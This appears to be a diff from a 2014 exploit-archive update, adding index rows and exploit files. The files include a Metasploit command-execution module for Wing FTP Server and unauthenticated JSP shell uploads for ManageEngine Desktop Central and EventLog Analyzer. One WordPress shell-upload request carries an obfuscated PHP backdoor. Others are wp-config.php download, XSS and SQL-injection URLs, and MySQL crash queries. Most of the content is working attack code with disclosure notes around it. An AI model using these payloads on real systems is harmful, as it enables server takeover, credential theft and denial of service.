Updated 09_03_2014

files.csv

@@ -31076,3 +31076,20 @@ id,file,description,date,author,platform,type,port
 34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 Malformed Bookmark HTML Injection Vulnerability",2010-08-19,Lostmon,multiple,remote,0
 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me 'answers.php' Cross-Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0
 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 'If-Modified-Since' Header Stack Buffer Overflow Vulnerability",2009-08-09,"lvac lvac",windows,dos,0
+34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 'index.html' HTML Injection Vulnerability",2010-08-19,indoushka,php,webapps,0
+34504,platforms/php/webapps/34504.txt,"Cacti <= 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS",2010-08-19,"Marc Schoenefeld",php,webapps,0
+34505,platforms/php/webapps/34505.txt,"MySQL <= 5.1.48 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability",2010-08-19,"Boris Reisig",php,webapps,0
+34506,platforms/linux/dos/34506.txt,"MySQL <= 5.1.48 'EXPLAIN' Denial Of Service Vulnerability",2010-08-20,"Bjorn Munch",linux,dos,0
+34507,platforms/linux/remote/34507.txt,"Nagios XI 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0
+34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0
+34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 'LOAD DATA INFILE' Denial Of Service Vulnerability",2010-08-20,"Elena Stepanova",linux,dos,0
+34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80
+34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS Vulnerability",2014-09-01,"Prakhar Prasad",multiple,webapps,0
+34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80
+34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466
+34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0
+34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400
+34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 'HANDLER' interface Denial Of Service Vulnerability",2010-08-20,"Matthias Leich",linux,dos,0
+34521,platforms/linux/dos/34521.txt,"Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0
+34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0
+34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0

platforms/jsp/webapps/34518.txt

@@ -0,0 +1,57 @@
+Arbitrary file upload / remote code execution in ManageEngine Desktop Central / Desktop Central MSP
+Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
+=================================================================================
+
+Background on the affected product:
+"Desktop Central is an integrated desktop & mobile device management
+software that helps in managing the servers, laptops, desktops,
+smartphones and tablets from a central point. It automates your
+regular desktop management routines like installing patches,
+distributing software, managing your IT Assets, managing software
+licenses, monitoring software usage statistics, managing USB device
+usage, taking control of remote desktops, and more."
+
+There are several vulnerable servers are out there if you know the
+Google dorks. Quoting the author of the Internet Census 2012: "As a
+rule of thumb, if you believe that "nobody would connect that to the
+Internet, really nobody", there are at least 1000 people who did."
+These vulnerabilities can be abused to achieve remote code execution
+as SYSTEM in Windows. I've updated the desktopcentral_file_upload
+Metasploit module to use the new statusUpdate technique. Needless to
+say, owning a Desktop Central box will give you control of all the
+computers and smartphones it manages.
+
+Technical details:
+#1
+Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)
+Constraints: none; no authentication or any other information needed
+
+a)
+CVE-2014-5005
+Affected versions: all versions from v7 to v9 build 90054
+Fix: Upgrade to DC v9 build 90055
+POST /statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1
+<... your favourite jsp shell here ...>
+
+b)
+CVE-2014-5006
+Affected versions: all versions from v8 to v9 build 90054
+Fix: Upgrade to DC v9 build 90055
+POST /mdm/mdmLogUploader?filename=..\\..\\..\webapps\\DesktopCentral\\shell.jsp
+<... your favourite jsp shell here ...>
+
+
+#2
+CVE-2014-5007
+Vulnerability: Remote code execution as SYSTEM via file upload (unauthenticated)
+Constraints: no authentication needed; need to know valid
+computerName, domainName and customerId
+Affected versions: all versions from v7 to v9 build 90054
+Fix: Upgrade to DC v9 build 90055
+Notes: This was previously discovered as CVE-2013-7390 / OSVDB-10008
+by Thomas Hibbert, and was "fixed" in 2013-11-09. The fix is
+incomplete and it is still possible to upload a shell with a valid
+computerName, domainName and customerId.
+
+POST /agentLogUploader?computerName=whatever1&domainName=whatever2&customerId=1337&filename=..\\..\\..\\..\\webapps\\DesktopCentral\\shell.jsp
+<... your favourite jsp shell here ...>

platforms/jsp/webapps/34519.txt

@@ -0,0 +1,155 @@
+Mogwai Security Advisory MSA-2014-01
+----------------------------------------------------------------------
+Title:              ManageEngine EventLog Analyzer Multiple Vulnerabilities
+Product:            ManageEngine EventLog Analyzer   
+Affected versions:  EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
+Impact:             critical
+Remote:             yes
+Product link:       http://www.manageengine.com/products/eventlog/
+Reported:           18/04/2013
+by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
+
+
+Vendor's Description of the Software:
+----------------------------------------------------------------------
+EventLog Analyzer provides the most cost-effective Security Information and
+Event Management (SIEM) software on the market. Using this Log Analyzer
+software, organizations can automate the entire process of managing terabytes
+of machine generated logs by collecting, analyzing, searching, reporting,
+and archiving from one central location. This event log analyzer software
+helps to mitigate internal threats, conduct log forensics analysis, monitor
+privileged users and comply to different compliance regulatory bodies
+by intelligently analyzing your logs and instantly generating a variety of
+reports like user activity reports, regulatory compliance reports,
+historical trend reports, and more.
+
+
+Business recommendation:
+----------------------------------------------------------------------
+During a penetration test, multiple vulnerabilities have been identified
+that are based on severe design/implementation flaws in the application.
+It is highly recommended not to use this software until a thorough
+security review has been performed by security professionals and all
+identified issues have been resolved.
+
+
+Vulnerability description:
+----------------------------------------------------------------------
+1) Unauthenticated remote code execution
+ME EventLog Analyzer contains a "agentUpload" servlet which is used by Agents
+to send log data as zip files to the central server. Files can be uploaded
+without
+authentication and are stored/decompressed in the "data" subdirectory.
+
+As the decompress procedure is handling the file names in the ZIP file in a
+insecure way it is possible to store files in the web root of server. This can
+be used to upload/execute code with the rights of the application server.
+
+2) Authorization issues
+The EventLog Analyzer web interface does not check if an authenticated has
+sufficient permissions to access certain parts of the application. A low
+privileged
+user (for example guest) can therefore access critical sections of the web
+interface,
+by directly calling the corresponding URLs. This can be used to access the
+database
+browser of the application which gives the attacker full access to the database.
+
+
+Proof of concept:
+----------------------------------------------------------------------
+1) Unauthenticated remote code execution
+
+
+- Create a malicious zip archive with the help of evilarc[1]
+evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp
+- Send the malicious archive to the agentUpload servlet
+curl -F "payload=@evil.zip" http://172.16.37.131:8400/agentUpload
+- Enjoy your shell
+http://172.16.37.131:8400/cmdshell.jsp
+
+A working Metasploit module will be released next week.
+
+
+2) Authorization issues
+- Log in as a low privileged user (for example guest/guest)
+- Directly call the URL of the database browser
+http://xxx.xxx.xxx.xxx:8400/event/runQuery.do
+
+
+Vulnerable / tested versions:
+----------------------------------------------------------------------
+EventLog Analyzer 8.2 (Build 8020) (Windows)
+EventLog Analyzer 8.2 (Build 8020) (Linux)
+EventLog Analyzer 9.0 (Build 9002) (Windows)
+EventLog Analyzer 9.0 (Build 9002) (Linux)
+
+Other versions might also be vulnerable.
+
+
+Disclosure timeline:
+----------------------------------------------------------------------
+14/04/2013: Vulnerability discovery
+18/04/2013: Informed vendor via ManageEngine Security Response Center (MESRC)
+Form
+23/04/2013: Second try to contact MESRC, as we didn't receive any response from
+the first try.
+23/04/2013: Response from vendor, they wait on some feedback from the
+development team
+10/05/2013: Response from vendor, saying that this is rather a issue than a
+vulnerability, will fix it anyway
+13/05/2013: Technical details including a working proof of concept send
+ManageEngine.
+13/05/2013: Vendor response, say that they forward it to the development team
+24/05/2013: Vendor response, saying that they will fix it in 2013 as they are
+"tightly scheduled on other priorities"
+24/05/2013: Response from us, asking if we will be informed when the
+vulnerability is fixed
+28/05/2013: Response from ManageEngine, saying that we must subscribe to their
+newsletter for release information
+05/09/2013: Verification that exploit is still working with the current version
+30/08/2014: Verification that exploit is still working with the current version
+31/08/2014: Public release
+
+Solution:
+----------------------------------------------------------------------
+No known solution
+
+Workaround:
+----------------------------------------------------------------------
+1) Unauthenticated remote code execution
+If agents are not used to collect log information, access to the servlet
+can be disabled by commenting out the following lines in the web.xml file
+(webapps/event/WEB-INF/web.xml) and restart the service.
+
+
+agentUpload
+com.adventnet.sa.agent.UploadHandlerServlet
+
+
+agentUpload
+/agentUpload
+
+
+
+2) Authorization issues
+No workaround, reduce the attack surface by disabling unused low privileged
+accounts like "guest".
+
+
+Advisory URL:
+----------------------------------------------------------------------
+https://www.mogwaisecurity.de/en/lab/advisories/
+
+
+References
+----------------------------------------------------------------------
+[1] evilarc
+https://github.com/ptoomey3/evilarc
+
+----------------------------------------------------------------------
+Mogwai, IT-Sicherheitsberatung Muench
+Steinhoevelstrasse 2/2
+89075 Ulm (Germany)
+
+info@mogwaisecurity.de

platforms/linux/dos/34506.txt

@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/42599/info
+
+MySQL is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the database, denying access to legitimate users.
+
+This issue affects versions prior to MySQL 5.1.49.
+
+NOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it. 
+
+CREATE TABLE t1 (a VARCHAR(10), FULLTEXT KEY a (a));
+INSERT INTO t1 VALUES (1),(2);
+CREATE TABLE t2 (b INT);
+INSERT INTO t2 VALUES (1),(2);
+
+EXPLAIN SELECT * FROM t1 UNION SELECT * FROM t1
+  ORDER BY (SELECT a FROM t2 WHERE b = 12);
+
+EXPLAIN SELECT * FROM t2 UNION SELECT * FROM t2
+  ORDER BY (SELECT * FROM t1 WHERE MATCH(a) AGAINST ('+abc' IN BOOLEAN MODE));
+
+DROP TABLE t1,t2;
+
+exit;

platforms/linux/dos/34510.txt

@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/42625/info
+
+MySQL is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the database, denying access to legitimate users.
+
+This issue affects versions prior to MySQL 5.1.49.
+
+NOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.
+
+# cat t/tst.test
+# The file might exist or not, it does not make any difference.
+# --send is important
+
+CREATE TABLE test.t_load (id INT NOT NULL);
+--send LOAD DATA LOCAL INFILE 'tb.txt' INTO TABLE test.t_load
+
+#<EOF>

platforms/linux/dos/34520.txt

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/42633/info
+
+MySQL is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the database, denying access to legitimate users.
+
+This issue affects versions prior to MySQL 5.1.49.
+
+NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it.. 
+
+--disable_warnings
+DROP TABLE IF EXISTS t1;
+--enable_warnings
+CREATE TABLE t1  ( pk INT , PRIMARY KEY (pk));
+HANDLER t1 OPEN AS handler_a;
+HANDLER handler_a READ FIRST;
+HANDLER handler_a READ `PRIMARY` NEXT;
+
+DROP TABLE t1;

platforms/linux/dos/34521.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42638/info
+
+MySQL is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the database, denying access to legitimate users.
+
+Versions prior to MySQL 5.1.49 are vulnerable. 
+
+The following example query is available:
+
+mysql> BINLOG '-2079193929'; 

platforms/linux/dos/34522.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42643/info
+
+MySQL is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the database, denying access to legitimate users.
+
+Versions prior to MySQL 5.1.49 are vulnerable.
+
+NOTE: This issue was previously disclosed in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record. 
+
+thd->query at 0x14bcdf0 = CREATE TEMPORARY TABLE operations ( op VARCHAR(16) ) ENGINE =InnoDB 

platforms/linux/remote/34507.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42604/info
+
+Nagios XI is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Nagios XI 2009R1.3 are vulnerable. 
+
+http://example.com/nagiosxi/login.php?%22;alert%281%29;//

platforms/multiple/remote/34523.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42661/info
+
+Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions prior to Nagios XI 2009R1.3 are vulnerable. 
+
+http://www.example.com/nagiosxi/admin/users.php?records=int8((select > password from xi_users where username= > CHR(110)||CHR(97)||CHR(103)||CHR(105)||CHR(111)||CHR(115)||CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)))&sortby=username&sortorder=asc&search=&page=1 

platforms/multiple/webapps/34513.txt

@@ -0,0 +1,28 @@
+Title: Arachni Web Application Scanner Web UI Stored XSS Vulnerability
+CVE: 2014-5469
+Vendor Homepage: http://www.arachni-scanner.com/
+Author: Prakhar Prasad
+Author Homepage: https://prakharprasad.com
+Reference: https://github.com/Arachni/arachni-ui-web/issues/71
+Affected Version: Arachni v0.4.7/WebUI v0.4.4 (possibly in lower versions
+too)
+Date: August 17th 2014
+Tested on: Arachni v0.4.7/WebUI v0.4.4 - Ubuntu 14.04
+
+
+ Details
+=======
+
+This is an authenticated Stored XSS, hence the user needs to be logged in
+to exploit this issue.
+
+A malicious user (admin/regular) can initiate a website scan in the Arachni
+Web UI. After initiating the scan, there is an option of users to comment
+onto it (with Markdown formatting). However using Markdown the malicious
+user can craft a link that will execute arbitrary Javascript once clicked.
+
+The proof of concept XSS comment: [XSS](javascript:alert('XSS'))
+
+The above comment will roughly translate into: <a
+href="javascript:alert('XSS');">XSS</a>. Hence creating an anchor with
+user-supplied Javascript content.

platforms/php/webapps/34503.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42572/info
+
+Syntax Highlighter is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Syntax Highlighter version 3.0.83 is vulnerable; others may also be affected.
+
+Inject the code ">"">>>><script>location="http://www.alkrsan.net"</script>""""> in index.html 

platforms/php/webapps/34504.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42575/info
+
+Cacti is prone to cross-site-scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Versions prior to Cacti 0.8.7g are vulnerable.
+
+http://www.example.com/cacti/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&page=1&action=view_logfile

platforms/php/webapps/34505.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/42598/info
+
+MySQL is prone to a denial-of-service vulnerability.
+
+An attacker can exploit these issues to crash the database, denying access to legitimate users.
+
+This issues affect versions prior to MySQL 5.1.49.
+
+NOTE: This issue was previously covered in BID 42598 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it. 
+
+mysql> SET storage_engine=MYISAM;
+
+mysql> CREATE TEMPORARY TABLE mk_upgrade AS SELECT  IF(     NULL  IS NOT NULL,      NULL
+, NULL) ; drop table mk_upgrade;

platforms/php/webapps/34508.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/42615/info
+
+AneCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example data is available:
+
+username = Sweet'"
+password = test
+re password = test
+email = charif38@hotmail.fr
+then register :] 

platforms/php/webapps/34511.txt

@@ -0,0 +1,43 @@
+# WordPress CuckooTap Theme & eShop Arbitrary File Download
+# Risk: High
+# CWE number: CWE-200
+# Author: Hugo Santiago
+# Contact: hugo.s@linuxmail.org
+# Date: 31/08/2014
+# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
+# Tested on: Windows 7 and Gnu/Linux
+# Google Dork: "Index of" +/wp-content/themes/cuckootap/
+
+# WordPress IncredibleWP Theme Arbitrary File Download
+# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
+# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
+
+# WordPress Ultimatum Theme Arbitrary File Download
+# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
+# Google Dork: "Index of" +/wp-content/themes/ultimatum
+
+# WordPress Medicate Theme Arbitrary File Download
+# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
+# Google Dork: "Index of" +/wp-content/themes/medicate/
+
+# WordPress Centum Theme Arbitrary File Download
+# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
+# Google Dork: "Index of" +/wp-content/themes/Centum/
+
+# WordPress Avada Theme Arbitrary File Download
+# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
+# Google Dork: "Index of" +/wp-content/themes/Avada/
+
+# WordPress Striking Theme & E-Commerce Arbitrary File Download
+# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
+# Google Dork: "Index of" +/wp-content/themes/striking_r/
+
+# WordPress Beach Apollo Arbitrary File Download
+# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
+# Google Dork: "Index of" +/wp-content/themes/beach_apollo/
+
+
+PoC:
+
+http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
+

platforms/php/webapps/34514.txt

@@ -0,0 +1,110 @@
+Summary: WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability. 
+Found by: Jesus Ramirez Pichardo
+  @whitexploit
+  http://whitexploit.blogspot.mx/
+Date: 2014-08-28
+Vendor Homepage: http://tribulant.com/
+Software: Slideshow Gallery
+Version: 1.4.6
+Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip 
+Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.
+
+Description:
+
+I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default). I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system.
+
+Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
+
+Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).
+
+Proof of Concept (PoC):
+
+1. An attacker uploads a PHP shell file (i.e. backdoor.php):
+
+POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save HTTP/1.1
+Host: 192.168.31.128
+Connection: keep-alive
+Content-Length: 2168
+Cache-Control: max-age=0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://192.168.31.128
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEGMugMZ1CVkRzbxV DNT: 1
+Referer: http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow- slides&method=save
+Accept-Encoding: gzip,deflate
+Accept-Language: es-ES,es;q=0.8,en;q=0.6,it;q=0.4,und;q=0.2
+Cookie: wordpress_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C9ee160d2851bbcdaa2865 e9010d92d46; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a8ed7709a5b8081c924ceda6269a7962=master%7C1409465845%7C0565892d6d7 f9de1022e4ad95b45d4ac; wp-settings-1=libraryContent%3Dupload%26editor%3Dtinymce; wp- settings-time-1=1409293045
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV
+Content-Disposition: form-data; name="Slide[id]"
+
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
+Content-Disposition: form-data; name="Slide[order]"
+
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
+Content-Disposition: form-data; name="Slide[title]"
+
+Test Shell Upload 
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
+Content-Disposition: form-data; name="Slide[description]"
+
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
+Content-Disposition: form-data; name="Slide[showinfo]"
+
+both
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
+Content-Disposition: form-data; name="Slide[iopacity]"
+
+70
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
+Content-Disposition: form-data; name="Slide[galleries][]"
+
+1
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV
+Content-Disposition: form-data; name="Slide[type]"
+
+file
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV
+Content-Disposition: form-data; name="image_file"; filename="backdoor.php" 
+Content-Type: application/octet-stream
+
+<?php
+$kvgk = str_replace("y","","ysytyry_yreypylyayce"); $dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz"; $asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiR rLic+Jzt9"; $gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSz h"; $fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpe zhyRrPSd";
+$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
+$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
+$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
+?>
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV
+Content-Disposition: form-data; name="Slide[image_url]"
+
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV
+Content-Disposition: form-data; name="Slide[uselink]"
+
+N
+
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV
+Content-Disposition: form-data; name="Slide[link]"
+
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV 
+Content-Disposition: form-data; name="Slide[linktarget]"
+
+self
+------WebKitFormBoundaryEGMugMZ1CVkRzbxV
+Content-Disposition: form-data; name="submit"
+
+Save Slide
+                      ------WebKitFormBoundaryEGMugMZ1CVkRzbxV--
+                      
+2. The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
+
+3. The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.
+
+#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit
+
+Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the
+vulnerable website.
+
+Vulnerability Disclosure Timeline:
+2014-08-28: Discovered vulnerability
+2014-08-29: Vendor Notification (support@tribulant.com) 
+2014-08-29: Vendor Response/Feedback
+2014-08-29: Vendor Fix/Patch
+2014-08-30: Public Disclosure

platforms/windows/remote/34517.rb

@@ -0,0 +1,123 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wing FTP Server Authenticated Command Execution',
+      'Description'    => %q{
+        This module exploits the embedded Lua interpreter in the admin web interface for
+        versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
+        an attacker can use os.execute() to execute arbitrary system commands on
+        the target with SYSTEM privileges.
+      },
+      'Author'         =>
+        [
+          'Nicholas Nam <nick[at]executionflow.org>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://www.wftpserver.com' ]
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows VBS Stager', {} ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jun 19 2014',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(5466),
+        OptString.new('USERNAME', [true, 'Admin username', '']),
+        OptString.new('PASSWORD', [true, 'Admin password', ''])
+      ], self.class
+    )
+    deregister_options('CMDSTAGER::FLAVOR')
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'uri'     =>  '/admin_login.html',
+        'method'  => 'GET'
+      })
+
+    if !res
+      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
+    elsif res.code != 200
+      fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.")
+    elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    @session_cookie = authenticate(username, password)
+
+    print_status("#{peer} - Sending payload")
+    # Execute the cmdstager, max length of the commands is ~1500
+    execute_cmdstager(flavor: :vbs, linemax: 1500)
+  end
+
+  def execute_command(cmd, _opts = {})
+    command = "os.execute('cmd /c #{cmd}')"
+
+    res = send_request_cgi(
+      'uri'       => '/admin_lua_script.html',
+      'method'    => 'POST',
+      'cookie'    => @session_cookie,
+      'vars_post' => { 'command' => command }
+    )
+
+    if res && res.code != 200
+      fail_with(Failure::Unkown, "#{peer} - Something went wrong.")
+    end
+  end
+
+  def authenticate(username, password)
+    print_status("#{peer} - Authenticating")
+    res = send_request_cgi(
+      'uri'       => '/admin_loginok.html',
+      'method'    => 'POST',
+      'vars_post' => {
+        'username'     => username,
+        'password'     => password,
+        'username_val' => username,
+        'password_val' => password,
+        'submit_btn'   => '+Login+'
+      }
+    )
+
+    uidadmin = ''
+    if !res
+      fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
+    elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
+      res.get_cookies.split(';').each do |cookie|
+        cookie.split(',').each do |value|
+          uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/
+        end
+      end
+    else
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+    end
+
+    "UIDADMIN=#{uidadmin}"
+  end
+end